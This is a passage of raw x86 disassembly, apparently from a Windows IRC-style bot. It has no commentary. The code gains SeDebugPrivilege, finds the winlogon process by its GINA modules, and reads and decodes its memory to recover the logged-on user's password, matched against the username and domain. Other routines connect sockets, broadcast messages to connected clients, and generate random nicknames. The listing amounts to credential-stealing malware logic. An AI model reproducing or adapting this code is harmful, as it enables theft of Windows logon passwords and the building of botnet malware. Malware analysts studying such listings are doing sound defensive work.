mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
push ecx
push eax
push ebp
push 10h
mov [esp+38h+var_C], eax
call dword_4DA960
test eax, eax
jnz short loc_419AF0
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_419AF0
xor ecx, ecx
inc ecx
cmp eax, ecx
mov ebx, ebp
mov [esp+28h+String], ecx
jb short loc_419AF0
loc_419A8C: ; CODE XREF: sub_419A03+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_419AE3
push 0
push 0
call dword_4DB168
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword_4DB16C
test eax, eax
jnz short loc_419AD4
mov eax, [edi+60h]
mov [esp+28h+var_8], eax
lea eax, [edi+80h]
push offset aWinlogon ; "WINLOGON"
push eax ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_419B08
loc_419AD4: ; CODE XREF: sub_419A03+AA�j
test edi, edi
jz short loc_419ADF
push edi
call dword_4DB170
loc_419ADF: ; CODE XREF: sub_419A03+D3�j
mov eax, [esp+28h+var_10]
loc_419AE3: ; CODE XREF: sub_419A03+8E�j
add ebx, 10h
inc [esp+28h+String]
cmp [esp+28h+String], eax
jbe short loc_419A8C
loc_419AF0: ; CODE XREF: sub_419A03+6D�j
; sub_419A03+7A�j ...
xor edi, edi
loc_419AF2: ; CODE XREF: sub_419A03+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42B0E0 ; RtlFreeHeap
mov eax, edi
loc_419B00: ; CODE XREF: sub_419A03+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_419B08: ; CODE XREF: sub_419A03+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_419B71
lea eax, [edi+80h]
mov [esp+28h+String], eax
loc_419B1E: ; CODE XREF: sub_419A03+16C�j
add [esp+28h+String], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+String] ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_419B85
push offset aMsgina ; "MSGINA"
push [esp+2Ch+String] ; String
call __strupr
pop ecx
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_419B63
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_419B63: ; CODE XREF: sub_419A03+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_419B1E
loc_419B71: ; CODE XREF: sub_419A03+10F�j
test edi, edi
jz short loc_419B7C
push edi
call dword_4DB170
loc_419B7C: ; CODE XREF: sub_419A03+170�j
mov edi, [esp+28h+var_4]
jmp loc_419AF2
; ---------------------------------------------------------------------------
loc_419B85: ; CODE XREF: sub_419A03+13C�j
xor eax, eax
jmp loc_419B00
sub_419A03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B8C proc near ; CODE XREF: sub_419FFD+F0�p
var_68 = byte ptr -68h
var_64 = dword ptr -64h
var_44 = byte ptr -44h
var_38 = dword ptr -38h
var_33 = byte ptr -33h
var_2F = byte ptr -2Fh
var_28 = byte ptr -28h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 68h
push esi
push [ebp+arg_0]
xor esi, esi
push esi
push 410h
mov [ebp+var_14], esi
call ds:dword_42B040 ; OpenProcess
cmp eax, esi
mov [ebp+var_8], eax
jnz short loc_419BB5
xor eax, eax
jmp loc_419D27
; ---------------------------------------------------------------------------
loc_419BB5: ; CODE XREF: sub_419B8C+20�j
mov eax, [ebp+arg_4]
push ebx
mov [eax], esi
push edi
lea eax, [ebp+var_68]
push eax
call ds:dword_42B0F4 ; GetSystemInfo
push [ebp+var_64]
mov [ebp+var_C], esi
mov esi, ds:dword_42B0E8
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_42B0E4
push eax
call edi ; RtlAllocateHeap
mov ebx, ds:dword_42B0F0
lea ecx, [ebp+var_C]
push ecx
push [ebp+var_64]
mov [ebp+var_4], eax
push eax
push 7FFDF000h
push [ebp+var_8]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_419C05
xor esi, esi
jmp loc_419D1A
; ---------------------------------------------------------------------------
loc_419C05: ; CODE XREF: sub_419B8C+70�j
push 1Ch
lea eax, [ebp+var_44]
push eax
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_8]
call ds:dword_42B0EC ; VirtualQueryEx
test eax, eax
jz loc_419D09
test [ebp+var_33], 10h
jz loc_419D09
test [ebp+var_2F], 1
jnz loc_419D09
push [ebp+var_38]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_38]
mov eax, [ebp+var_4]
push edi
push dword ptr [eax+18h]
mov [ebp+var_10], edi
push [ebp+var_8]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_419D09
loc_419C60: ; CODE XREF: sub_419B8C+108�j
push edi ; wchar_t *
push offset word_4DA160 ; wchar_t *
call __wcsicmp
test eax, eax
pop ecx
pop ecx
jnz short loc_419C88
lea eax, [edi+200h]
push eax ; wchar_t *
push offset word_4DA968 ; wchar_t *
call __wcsicmp
test eax, eax
pop ecx
pop ecx
jz short loc_419C98
loc_419C88: ; CODE XREF: sub_419B8C+E3�j
mov eax, [ebp+var_38]
mov ecx, [ebp+var_10]
inc edi
inc edi
add eax, ecx
cmp edi, eax
jb short loc_419C60
jmp short loc_419D09
; ---------------------------------------------------------------------------
loc_419C98: ; CODE XREF: sub_419B8C+FA�j
test edi, edi
jz short loc_419D09
lea eax, [ebp+var_18]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_42B0AC ; FileTimeToLocalFileTime
test eax, eax
jz short loc_419CD5
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_18]
push eax
call ds:dword_42B0A8 ; FileTimeToSystemTime
test eax, eax
jz short loc_419CD5
mov ecx, [ebp+arg_4]
xor eax, eax
mov al, [edi+42Ch]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_419CD5: ; CODE XREF: sub_419B8C+123�j
; sub_419B8C+135�j
movzx eax, byte ptr [edi+42Dh]
mov dword_4DB180, eax
mov eax, [ebp+var_4]
mov eax, [eax+18h]
sub eax, [ebp+var_10]
mov [ebp+var_14], 1
lea eax, [eax+edi+434h]
add edi, 434h
mov dword_4DB178, eax
mov Src, edi
loc_419D09: ; CODE XREF: sub_419B8C+90�j
; sub_419B8C+9A�j ...
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42B0E0 ; RtlFreeHeap
mov esi, [ebp+var_14]
loc_419D1A: ; CODE XREF: sub_419B8C+74�j
push [ebp+var_8]
call ds:dword_42B004 ; CloseHandle
pop edi
mov eax, esi
pop ebx
loc_419D27: ; CODE XREF: sub_419B8C+24�j
pop esi
leave
retn
sub_419B8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D2A proc near ; CODE XREF: sub_419FFD:loc_41A0F4�p
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1B = byte ptr -1Bh
var_17 = byte ptr -17h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push [ebp+arg_0]
push 0
push 410h
call ds:dword_42B040 ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jnz short loc_419D49
leave
retn
; ---------------------------------------------------------------------------
loc_419D49: ; CODE XREF: sub_419D2A+1B�j
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push ebx
push esi
push edi
lea eax, [ebp+var_50]
push eax
call ds:dword_42B0F4 ; GetSystemInfo
mov eax, [ebp+var_44]
mov ebx, [ebp+var_48]
cmp ebx, eax
mov [ebp+var_10], eax
jnb loc_419E09
mov edi, ds:dword_42B0E8
loc_419D73: ; CODE XREF: sub_419D2A+D9�j
push 1Ch
lea eax, [ebp+var_2C]
push eax
push ebx
push [ebp+var_4]
call ds:dword_42B0EC ; VirtualQueryEx
test eax, eax
jz short loc_419DF7
test [ebp+var_1B], 10h
mov eax, [ebp+var_20]
mov [ebp+var_8], eax
jz short loc_419DFD
test [ebp+var_17], 1
jnz short loc_419DFD
push eax
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_42B0E4 ; RtlAllocateHeap
and [ebp+var_C], 0
mov esi, eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_20]
push esi
push ebx
push [ebp+var_4]
call ds:dword_42B0F0 ; ReadProcessMemory
test eax, eax
jz short loc_419DE9
push offset word_4DA160 ; wchar_t *
push esi ; wchar_t *
call __wcsicmp
test eax, eax
pop ecx
pop ecx
jnz short loc_419DE9
lea eax, [esi+400h]
push offset word_4DA968 ; wchar_t *
push eax ; wchar_t *
call __wcsicmp
test eax, eax
pop ecx
pop ecx
jz short loc_419E1B
loc_419DE9: ; CODE XREF: sub_419D2A+95�j
; sub_419D2A+A6�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_42B0E0 ; RtlFreeHeap
jmp short loc_419DFD
; ---------------------------------------------------------------------------
loc_419DF7: ; CODE XREF: sub_419D2A+5B�j
mov eax, [ebp+var_4C]
mov [ebp+var_8], eax
loc_419DFD: ; CODE XREF: sub_419D2A+67�j
; sub_419D2A+6D�j ...
add ebx, [ebp+var_8]
cmp ebx, [ebp+var_10]
jb loc_419D73
loc_419E09: ; CODE XREF: sub_419D2A+3D�j
xor esi, esi
loc_419E0B: ; CODE XREF: sub_419D2A+123�j
push [ebp+var_4]
call ds:dword_42B004 ; CloseHandle
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419E1B: ; CODE XREF: sub_419D2A+BD�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword_4DB178, ebx
mov Src, eax
cmp [eax], cl
jnz short loc_419E3D
cmp [eax+1], cl
jz short loc_419E45
loc_419E3D: ; CODE XREF: sub_419D2A+10C�j
; sub_419D2A+119�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_419E3D
loc_419E45: ; CODE XREF: sub_419D2A+111�j
mov eax, [ebp+arg_4]
xor esi, esi
mov [eax], ecx
inc esi
jmp short loc_419E0B
sub_419D2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E4F proc near ; CODE XREF: sub_419FFD+134�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_4DB174
add eax, eax
mov [ebp+var_8], ax
add eax, 2
push esi
mov esi, ds:dword_42B0E8
mov [ebp+var_6], ax
movzx eax, ax
push edi
push eax
push 8
call esi ; GetProcessHeap
push eax
call ds:dword_42B0E4 ; RtlAllocateHeap
mov ecx, dword_4DB174
add ecx, ecx
push ecx ; Size
push Src ; Src
mov [ebp+var_4], eax
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
xor eax, eax
mov al, byte ptr dword_4DB180
push eax
call dword_4DA964
push [ebp+var_4]
mov edi, offset byte_4DB188
push offset word_4DA160
push offset word_4DA968
push [ebp+arg_0]
push offset asc_4370F0 ; "-"
push 200h ; Count
push edi ; Dest
call __snprintf
add esp, 1Ch
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42B0E0 ; RtlFreeHeap
mov eax, edi
pop edi
pop esi
leave
retn
sub_419E4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419EE6 proc near ; CODE XREF: sub_419FFD:loc_41A138�p
var_18 = word ptr -18h
var_16 = word ptr -16h
Dst = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_4DB174
add eax, eax
push ebx
mov [ebp+var_18], ax
add eax, 2
push esi
mov [ebp+var_16], ax
movzx eax, ax
push edi
push eax
push 8
call ds:dword_42B0E8 ; GetProcessHeap
push eax
call ds:dword_42B0E4 ; RtlAllocateHeap
and [ebp+var_C], 0
mov [ebp+Dst], eax
mov ebx, offset word_4DA968
mov edi, 200h
mov esi, offset byte_4DB388
loc_419F2A: ; CODE XREF: sub_419EE6+F8�j
mov eax, dword_4DB174
add eax, eax
push eax ; Size
push Src ; Src
push [ebp+Dst] ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call dword_4DA964
mov eax, dword_4DB174
and [ebp+var_10], 0
test eax, eax
mov ecx, [ebp+Dst]
mov [ebp+var_8], 1
jbe short loc_419F9F
loc_419F67: ; CODE XREF: sub_419EE6+B1�j
cmp [ebp+var_8], 0
jz short loc_419FBC
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_419F8B
cmp byte ptr [ecx+1], 0
jnz short loc_419F8B
cmp dl, 20h
jnb short loc_419F85
and [ebp+var_8], 0
loc_419F85: ; CODE XREF: sub_419EE6+99�j
cmp [ebp+var_1], 7Eh
jbe short loc_419F8F
loc_419F8B: ; CODE XREF: sub_419EE6+8E�j
; sub_419EE6+94�j
and [ebp+var_8], 0
loc_419F8F: ; CODE XREF: sub_419EE6+A3�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_419F67
cmp [ebp+var_8], 0
jz short loc_419FBC
loc_419F9F: ; CODE XREF: sub_419EE6+7F�j
push [ebp+Dst]
push offset word_4DA160
push ebx
push [ebp+arg_0]
push offset asc_4370F0 ; "-"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 1Ch
jmp short loc_419FD4
; ---------------------------------------------------------------------------
loc_419FBC: ; CODE XREF: sub_419EE6+85�j
; sub_419EE6+B7�j
push offset word_4DA160
push ebx
push [ebp+arg_0]
push offset asc_437140 ; "-"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 18h
loc_419FD4: ; CODE XREF: sub_419EE6+D4�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_419F2A
push [ebp+Dst]
push 0
call ds:dword_42B0E8 ; GetProcessHeap
push eax
call ds:dword_42B0E0 ; RtlFreeHeap
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_419EE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_419FFD proc near ; DATA XREF: sub_40274D+1AE3�o
Dest = byte ptr -29Ch
var_9C = dword ptr -9Ch
Str = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 29Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_9C]
rep movsd
xor esi, esi
inc esi
mov [eax+90h], esi
call sub_41D64B
cmp eax, esi
mov [ebp+74h+var_4], eax
jz short loc_41A03C
cmp eax, 2
jz short loc_41A03C
push offset dword_437368
jmp loc_41A179
; ---------------------------------------------------------------------------
loc_41A03C: ; CODE XREF: sub_419FFD+2E�j
; sub_419FFD+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41C3D9
test eax, eax
pop ecx
pop ecx
jz loc_41A174
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:dword_42B018 ; LoadLibraryA
mov esi, ds:dword_42B020
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+74h+var_8], edi
call esi ; GetProcAddress
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov dword_4DA960, eax
call esi ; GetProcAddress
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov dword_4DB168, eax
call esi ; GetProcAddress
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov dword_4DB16C, eax
call esi ; GetProcAddress
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov dword_4DB170, eax
call esi ; GetProcAddress
mov dword_4DA964, eax
call sub_419A03
test eax, eax
mov [ebp+74h+arg_0], eax
jz loc_41A148
mov esi, ds:dword_42B0FC
mov edi, 400h
push edi
mov ebx, offset word_4DA160
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset word_4DA968
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+74h+var_4], 1
push offset dword_4DB174
push [ebp+74h+arg_0]
jnz short loc_41A0F4
call sub_419B8C
jmp short loc_41A0F9
; ---------------------------------------------------------------------------
loc_41A0F4: ; CODE XREF: sub_419FFD+EE�j
call sub_419D2A
loc_41A0F9: ; CODE XREF: sub_419FFD+F5�j
test eax, eax
pop ecx
pop ecx
jz short loc_41A141
cmp dword_4DB174, 0
jnz short loc_41A128
push ebx
push edi
push [ebp+74h+arg_0]
lea eax, [ebp+74h+Dest]
push offset asc_437230 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
jmp short loc_41A15B
; ---------------------------------------------------------------------------
loc_41A128: ; CODE XREF: sub_419FFD+109�j
cmp [ebp+74h+var_4], 1
push [ebp+74h+arg_0]
jnz short loc_41A138
call sub_419E4F
jmp short loc_41A13D
; ---------------------------------------------------------------------------
loc_41A138: ; CODE XREF: sub_419FFD+132�j
call sub_419EE6
loc_41A13D: ; CODE XREF: sub_419FFD+139�j
pop ecx
push eax
jmp short loc_41A14D
; ---------------------------------------------------------------------------
loc_41A141: ; CODE XREF: sub_419FFD+100�j
push offset unk_4371F4
jmp short loc_41A14D
; ---------------------------------------------------------------------------
loc_41A148: ; CODE XREF: sub_419FFD+B5�j
push offset asc_4371C8 ; "-"
loc_41A14D: ; CODE XREF: sub_419FFD+142�j
; sub_419FFD+149�j
lea eax, [ebp+74h+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41A15B: ; CODE XREF: sub_419FFD+129�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41C3D9
pop ecx
pop ecx
push [ebp+74h+var_8]
call ds:dword_42B0F8 ; FreeLibrary
jmp short loc_41A187
; ---------------------------------------------------------------------------
loc_41A174: ; CODE XREF: sub_419FFD+4E�j
push offset asc_437194 ; "-"
loc_41A179: ; CODE XREF: sub_419FFD+3A�j
lea eax, [ebp+74h+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41A187: ; CODE XREF: sub_419FFD+175�j
xor esi, esi
cmp [ebp+74h+var_10], esi
jnz short loc_41A1A8
push esi ; int
push [ebp+74h+var_14] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_9C] ; int
call sub_40123B
add esp, 14h
loc_41A1A8: ; CODE XREF: sub_419FFD+18F�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_18]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_419FFD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A1C6 proc near ; CODE XREF: sub_418799+35�p
; sub_418CEA+B8�p ...
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_444100 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_41A242
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+arg_4]
mov [ebp+Dst], 2
call dword_444260 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_44417C ; inet_addr
cmp eax, esi
jnz short loc_41A227
push [ebp+arg_0]
call dword_444168 ; gethostbyname
test eax, eax
jz short loc_41A242
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_41A227: ; CODE XREF: sub_41A1C6+4B�j
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+Dst]
push eax
push edi
call dword_4440AC ; connect
cmp eax, esi
jnz short loc_41A246
push edi
call dword_444218 ; closesocket
loc_41A242: ; CODE XREF: sub_41A1C6+1B�j
; sub_41A1C6+58�j
mov eax, esi
jmp short loc_41A248
; ---------------------------------------------------------------------------
loc_41A246: ; CODE XREF: sub_41A1C6+73�j
mov eax, edi
loc_41A248: ; CODE XREF: sub_41A1C6+7E�j
pop edi
pop esi
leave
retn
sub_41A1C6 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41A24C(char *Dest)
sub_41A24C proc near ; CODE XREF: sub_40274D+305E�p
; sub_40274D+30C1�p ...
Dest = dword ptr 4
push esi
push edi
mov edi, [esp+8+Dest]
push offset asc_42CDD8 ; "\n"
push edi ; Dest
call _strcat
pop ecx
pop ecx
mov esi, offset dword_4DB58C
loc_41A264: ; CODE XREF: sub_41A24C+42�j
cmp dword ptr [esi-4], 1
jnz short loc_41A282
cmp dword ptr [esi], 0
jbe short loc_41A282
push 0
push edi ; Str
call _strlen
pop ecx
push eax
push edi
push dword ptr [esi]
call dword_4441A0 ; send
loc_41A282: ; CODE XREF: sub_41A24C+1C�j
; sub_41A24C+21�j
add esi, 210h
cmp esi, offset dword_4E1CAC
jl short loc_41A264
pop edi
pop esi
retn
sub_41A24C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A293(char *Dest)
sub_41A293 proc near ; CODE XREF: sub_40274D+34C1�p
; sub_40274D+3504�p ...
Source = byte ptr -3Ch
Dst = byte ptr -28h
var_27 = byte ptr -27h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3Ch
push 14h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
call _rand
mov [ebp+var_C], eax
fild [ebp+var_C]
fmul ds:dbl_437B00
call __ftol2
cmp eax, 1
jnz short loc_41A2DD
call _rand
call _rand
push 66h
cdq
pop ecx
idiv ecx
push off_4431D0[edx*4]
jmp short loc_41A2F6
; ---------------------------------------------------------------------------
loc_41A2DD: ; CODE XREF: sub_41A293+2F�j
call _rand
call _rand
cdq
mov ecx, 0C0h
idiv ecx
push off_442ED0[edx*4] ; Source
loc_41A2F6: ; CODE XREF: sub_41A293+48�j
lea eax, [ebp+Dst]
push eax ; Dest
call _strcpy
pop ecx
pop ecx
push ebx
push esi
lea eax, [ebp+Dst]
push edi
push eax ; Str
call _strlen
pop ecx
mov esi, eax
push 13h
pop ebx
mov [ebp+var_4], esi
sub ebx, esi
call _rand
mov [ebp+var_C], eax
fild [ebp+var_C]
fmul ds:dbl_437AF8
call __ftol2
mov [ebp+var_14], eax
call _rand
mov [ebp+var_C], eax
fild [ebp+var_C]
fimul [ebp+var_4]
fmul ds:dbl_437AF0
call __ftol2
cmp esi, 2
mov edi, offset a__1 ; "-|`_\\{[]}"
jle short loc_41A368
cmp esi, 3
jnz short loc_41A35F
cmp [ebp+var_14], 1
jz short loc_41A368
loc_41A35F: ; CODE XREF: sub_41A293+C4�j
cmp eax, 1
jnz loc_41A42B
loc_41A368: ; CODE XREF: sub_41A293+BF�j
; sub_41A293+CA�j
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437AD8
call __ftol2
push off_4431D0[eax*4] ; Source
lea eax, [ebp+Source]
push eax ; Dest
call _strcpy
lea eax, [ebp+esi+Dst]
mov [ebp+var_C], eax
movsx eax, byte ptr [eax-1]
push eax ; Val
push edi ; Str
call _strchr
add esp, 10h
test eax, eax
jnz short loc_41A41A
movsx eax, [ebp+Source]
push eax ; Val
push edi ; Str
call _strchr
test eax, eax
pop ecx
pop ecx
jnz short loc_41A41A
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
dec esi
mov [ebp+var_14], esi
fild [ebp+var_14]
fmulp st(1), st
fmul ds:dbl_437AF0
call __ftol2
cmp eax, 1
jnz short loc_41A41A
push edi ; Str
call _strlen
test eax, eax
mov [ebp+var_14], eax
fild [ebp+var_14]
pop ecx
jge short loc_41A3F3
fadd ds:dbl_433200
loc_41A3F3: ; CODE XREF: sub_41A293+158�j
fstp qword ptr [ebp-8]
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul qword ptr [ebp-8]
fmul ds:dbl_437AF0
call __ftol2
mov al, byte ptr ds:a__1[eax] ; "-|`_\\{[]}"
mov ecx, [ebp+var_C]
mov [ecx], al
loc_41A41A: ; CODE XREF: sub_41A293+112�j
; sub_41A293+123�j ...
push ebx ; Count
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dst]
push eax ; Dest
call _strncat
add esp, 0Ch
loc_41A42B: ; CODE XREF: sub_41A293+CF�j
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
mov esi, eax
lea ebx, [ebp+esi+Dst]
movsx eax, byte ptr [ebx-1]
push eax ; C
mov [ebp+var_4], esi
call _isdigit
test eax, eax
pop ecx
pop ecx
jnz loc_41A695
and [ebp+var_C], eax
movsx eax, byte ptr [ebx-1]
push eax ; Val
push edi ; Str
call _strchr
test eax, eax
pop ecx
pop ecx
jnz loc_41A595
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
lea eax, [esi+3]
mov [ebp+var_14], eax
fild [ebp+var_14]
fmulp st(1), st
fmul ds:dbl_437AF0
call __ftol2
cmp esi, 3
jz short loc_41A498
cmp eax, 1
jnz loc_41A595
loc_41A498: ; CODE XREF: sub_41A293+1FA�j
push 2
cdq
pop ecx
idiv ecx
cmp edx, 1
jnz short loc_41A4E0
push edi ; Str
call _strlen
test eax, eax
mov [ebp+var_14], eax
fild [ebp+var_14]
pop ecx
jge short loc_41A4BA
fadd ds:dbl_433200
loc_41A4BA: ; CODE XREF: sub_41A293+21F�j
fstp qword ptr [ebp-10h]
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul qword ptr [ebp-10h]
fmul ds:dbl_437AF0
call __ftol2
mov al, byte ptr ds:a__1[eax] ; "-|`_\\{[]}"
mov [ebx], al
jmp short loc_41A4FC
; ---------------------------------------------------------------------------
loc_41A4E0: ; CODE XREF: sub_41A293+20E�j
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437AD0
call __ftol2
mov cl, 41h
sub cl, al
mov [ebx], cl
loc_41A4FC: ; CODE XREF: sub_41A293+24B�j
xor ebx, ebx
inc esi
inc ebx
mov [ebp+var_4], esi
mov [ebp+var_C], ebx
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437AC8
call __ftol2
cmp esi, 3
jz short loc_41A525
cmp eax, ebx
jnz short loc_41A595
loc_41A525: ; CODE XREF: sub_41A293+28C�j
push 2
pop ebx
cdq
mov ecx, ebx
idiv ecx
test edx, edx
jnz short loc_41A570
push edi ; Str
call _strlen
test eax, eax
mov [ebp+var_14], eax
fild [ebp+var_14]
pop ecx
jge short loc_41A548
fadd ds:dbl_433200
loc_41A548: ; CODE XREF: sub_41A293+2AD�j
fstp qword ptr [ebp-10h]
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul qword ptr [ebp-10h]
fmul ds:dbl_437AF0
call __ftol2
mov al, byte ptr ds:a__1[eax] ; "-|`_\\{[]}"
mov [ebp+esi+Dst], al
jmp short loc_41A58E
; ---------------------------------------------------------------------------
loc_41A570: ; CODE XREF: sub_41A293+29C�j
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437AD0
call __ftol2
mov cl, 41h
sub cl, al
mov [ebp+esi+Dst], cl
loc_41A58E: ; CODE XREF: sub_41A293+2DB�j
inc esi
mov [ebp+var_4], esi
mov [ebp+var_C], ebx
loc_41A595: ; CODE XREF: sub_41A293+1D0�j
; sub_41A293+1FF�j ...
cmp esi, 6
jge short loc_41A615
call _rand
cmp esi, 5
jge short loc_41A5B2
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437AF8
jmp short loc_41A5CB
; ---------------------------------------------------------------------------
loc_41A5B2: ; CODE XREF: sub_41A293+30F�j
mov [ebp+var_14], eax
fild [ebp+var_14]
push 8
pop eax
sub eax, esi
mov [ebp+var_14], eax
fild [ebp+var_14]
fmulp st(1), st
fmul ds:dbl_437AF0
loc_41A5CB: ; CODE XREF: sub_41A293+31D�j
call __ftol2
test eax, eax
jnz short loc_41A5EE
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437AC0
call __ftol2
mov cl, 30h
jmp short loc_41A60B
; ---------------------------------------------------------------------------
loc_41A5EE: ; CODE XREF: sub_41A293+33F�j
cmp eax, 1
jnz short loc_41A615
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437AD0
